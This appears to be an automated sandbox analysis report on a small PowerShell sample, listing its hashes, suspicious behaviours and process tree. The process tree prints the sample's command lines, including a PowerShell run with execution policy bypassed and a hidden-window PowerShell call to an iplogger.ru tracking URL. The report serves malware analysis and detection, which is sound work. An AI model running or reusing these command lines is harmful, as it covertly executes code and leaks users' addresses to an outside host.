Analysis
-
max time kernel
14s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 10:36
Static task
static1
Behavioral task
behavioral1
Sample
abcd.ps1
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
abcd.ps1
Resource
win10v2004-20241007-en
General
-
Target
abcd.ps1
-
Size
166B
-
MD5
a642cd52d29b5b054520bd4fef292062
-
SHA1
564380bbf0fb66cf03969d3438a3cd5cd613b9d4
-
SHA256
43d84ae71fa0d0895af8b2d5a45841fc73c38c079b1dcf787ef7427e0795e937
-
SHA512
d80d7bb51c80a663d1da7d893e364028f5cc75d54ca6c75e043eed58ce784927750866318eed377881c902901b3b8be3708ac6e1ffd272cdf2d1b8ef3027b2d0
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid process 2856 powershell.exe 2864 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2856 powershell.exe 2864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
powershell.exedescription pid process target process PID 2856 wrote to memory of 2864 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 2864 2856 powershell.exe powershell.exe PID 2856 wrote to memory of 2864 2856 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abcd.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden -command = https://iplogger.ru/2tm2952⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55b813afe1c56d53fe4438f08cf0d9873
SHA192c8635d7c1456f4db21b62ad38d67e50e8329d8
SHA256dfafa16927ab173aaf1eff599cc1e91f8833c9218d004d488442e5210542835e
SHA512f0b81e2f29f89febb91d295c106c6cfec4916d4062aec84880702ee550099649f657bdba51d241664408033d1f40cf952e008aec3e867389d9ba6d3c901392f6